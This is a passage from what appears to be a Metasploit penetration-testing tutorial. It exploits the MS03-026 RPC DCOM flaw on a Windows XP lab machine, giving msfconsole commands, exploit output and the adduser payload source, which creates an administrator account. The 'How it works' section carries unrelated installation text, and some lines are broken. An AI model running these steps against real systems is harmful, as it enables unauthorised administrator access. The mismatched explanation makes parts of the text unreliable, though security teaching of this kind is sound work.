0 Windows NT SP3-6a/2000/XP/2003 Universal
Here, we can see that the dcom exploit is available for several flavors of the Windows machine.
In Chapter 1, Metasploit Quick Tips for Security Professionals, we discussed how the entire Metasploit framework has a modular architecture. Different exploits are converted into a framework-understandable module, which can function in accordance with it. Different commands are called to load and set up the modules. The command-line interface of msfconsole makes it easy to access different modules and perform penetration testing.
Penetration testing on a Windows XP SP2 machine
Let us now get our hands into the world of exploits. To start with, we will work on the most primary, yet most widely used, operating system, Windows XP. In this recipe, we will see how we can use Metasploit to break into our target system, which is running on the Windows XP machine. We will be using the commands we learned in the previous section, and then move ahead to select exploits and payloads, and set up various required parameters.
Getting ready
We will start our penetration testing process right from msfconsole. So, launch the console and perform a port scan to gather information about the target. We discussed port scanning in detail in the previous chapter. Here, I will assume that you have gathered information about
How to do it...
To perform penetration testing on a Windows XP SP2 machine, follow these steps:
1. The primary goal will be to select an exploit that can be used on a Windows XP machine. You can browse to the /exploits/windows directory, or simply make a search for a list of available exploits for the Windows XP platform. We will be using the RPC dcom vulnerability to penetrate our target. So, let us first search for the RPC dcom vulnerability, using the following command:
msf exploit(ms03_026_dcom) > search dcom
Matching Modules
================
Name Disclosure Date Rank Description ---- ---- ---
exploit/windows
dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC
xploit/windows/
driver/
broadcom_wifi_ssid 2006-11-11 low Broadcom Wireless
xploit/windows/
smb/ms04_031_netdde 2004-10-12 good Microsoft NetDDE As we can see, the search has produced three results. We will be working on the first exploit, as its rank is listed as great and it will have a better success rate.
2. In order to set exploit/windows/dcerpc/ms03_026_dcom as the usable exploit, we will execute the following command:
msf exploit(ms03_026_dcom) > use exploit/windows/dcerpc/ms03_026_
dcom
msf exploit(ms03_026_dcom) >
The change in the prompt symbolizes that the command is executed successfully.
3. The next step is to set up the various parameters of the exploit. The show options command will list the available parameters in the exploit. Then, by using the set command, we can set up the various parameters. Some parameters will have default values as well:
msf exploit(ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description ---- ---- ---
RHOST yes The target address RPORT 135 yes The target port
Exploit target:
Id Name --
0 Windows NT SP3-6a/2000/XP/2003 Universal
Here, RHOST denotes the IP address of the remote host and RPORT denotes the default bind port. The value or RPORT has been set to 135 by default. We will have to set the value of RHOST to our target IP address in order to execute the exploit:
msf exploit(ms03_026_dcom) > set RHOST 192.168.56.102 RHOST => 192.168.56.102
msf exploit(ms03_026_dcom) >
Note that the ms03_026_dcom exploit has the ID set to 0. This means that we do not need to specify which Windows machine is running on the target. It can exploit any of the Windows machines listed in it. For any other exploit, we may have to select the target operating system by using the show targets command.
Now, the value of RHOST has been set to our target IP address. If we try to run the exploit, we will get an error message, because we have not yet selected any payload for the exploit.
4. Our next step is to choose a relevant payload. We can use the command show payloads to list all the available payloads. We will start with a simple example of the windows/adduser payload. This payload will add a new user in the target's operating system:
msf exploit(ms03_026_dcom) > set PAYLOAD windows/adduser PAYLOAD => windows/adduser
5. Now, if we again use the show options command, it will list the parameters for both the exploit and the payload. The payload parameters will look something as follows:
We can see that the default username and password that will be added to our target operating system is metasploit and metasploit. We can change these values by using the set PASS and set USER commands.
6. Now that our payload is set, we are ready to penetrate the target machine. We will use the following command to launch the exploit:
msf exploit(ms03_026_dcom) > exploit
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_
tcp:192.168.56.102[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_
tcp:192.168.56.102[135] ...
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
The last line of the output shows that the exploit was completed successfully on the target machine. Now, there will be a new user added in the target machine. The output also says that no session was created. This is because the payload we used was a simple adduser that doesn't need any active session. Hence, once the exploit
How it works...
The installation process demonstrated previously is a simple Ubuntu-based installation procedure for almost all the software. Once the installation is complete, you can run hash –r to reload your path.
This installation process can be followed on almost all flavors and versions of Linux.
There's more...
There is vulnerability in the part of RPC that deals with the message exchange over TCP/
IP. The failure results because of incorrect handling of malformed messages. This particular vulnerability affects a Distributed Component Object Model (DCOM) interface with RPC, which listens on RPC-enabled ports. So, the target machine must have an available port running an RPC service.
This interface handles the DCOM object activation requests that are sent by client machines to the server. An attacker who successfully exploited this vulnerability would be able to run the code with local system privileges on an affected system. The attacker would be able to take any action on the system. This includes installing programs, viewing/changing/deleting data, or creating new accounts with full privileges.
For more details on this vulnerability, you can visit the following link to the Microsoft Security Bulletin: http://technet.microsoft.com/en-us/security/bulletin/ms03-026. Now, in order to understand the working of the adduser payload, we will analyze the Ruby code for the payload. Let us browse to the payload location:
root@bt:~# cd /pentest/exploits/framework3/modules/payloads/singles/
windows
root@bt:/pentest/exploits/framework3/modules/payloads/singles/
windows# less adduser.rb
The following part of the code is of interest for us:
# Register command execution options register_options(
[
OptString.new('USER', [ true, "The username to create", "metasploit" ]),
], self.class) # Hide the CMD option
deregister_options('CMD') end
#
# Override the exec command string #
def command_string
user = datastore['USER'] || 'metasploit' pass = datastore['PASS'] || ''
if(pass.length > 14)
raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
end
return "cmd.exe /c net user #{user} #{pass} /ADD && "
+
"net localgroup Administrators #{user} /ADD"
end
You can understand the code through the comments added with the # symbol. The code is simple and self-explanatory. It first registers values for the username and password. Then, it goes on to hide the CMD function from appearing on the target screen, while the payload gets executed. Next, the code overrides the windows/exec payload to pass the parameter values and launch a stealth command prompt to execute in the background.
You can play with the code and make your own changes. This will help you dig deeper into the world of payloads.